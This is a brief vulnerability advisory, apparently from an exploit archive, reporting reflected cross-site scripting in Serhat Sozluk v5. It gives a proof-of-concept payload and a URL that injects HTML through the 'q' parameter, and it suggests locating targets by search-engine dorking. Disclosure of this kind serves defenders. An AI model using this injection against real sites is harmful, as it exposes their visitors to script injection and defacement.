Serhat Sozluk 5 Cross Site Scripting

Serhat Sozluk version 5 suffers from a cross site scripting vulnerability.


MD5 | 82026baf7b1436103b92a69abab45fdc

============================================================================
| # Title : Serhat Sozluk v5 XSS Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : v5 |
| # Vendor : http://wmscripti.com |
| # Dork : n/a |
============================================================================

poc :

Application error message :

[+] Dorking Adegn Google Or Other Search Enggine

[+] use payload : <marquee><font color=lime size=32>indoushka</font></marquee>

http://127.0.0.1/serhatsozlukv5/sozluk.php?process=word&q=deneme%252013%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E

Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts